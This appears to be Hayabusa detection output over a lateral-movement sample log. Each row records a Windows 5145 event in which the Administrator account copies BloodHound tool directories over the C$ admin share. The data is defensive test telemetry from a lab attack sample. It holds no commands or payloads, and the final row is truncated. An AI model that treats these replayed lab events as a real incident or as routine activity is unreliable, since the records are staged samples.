0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.788 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.788 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.798 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.808 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.808 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.808 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.818 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.818 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.818 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.818 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.818 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.828 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.828 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.828 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.828 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.828 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.838 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.838 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.838 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.838 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.848 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.848 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.848 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.848 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.848 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.848 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.858 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.858 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.858 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.858 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.858 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.868 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.868 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.868 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.868 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.878 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.878 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.878 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.878 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.878 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.888 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.888 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.888 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.888 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.898 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.898 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.908 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.908 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.908 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.908 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.918 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.918 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.918 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.918 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 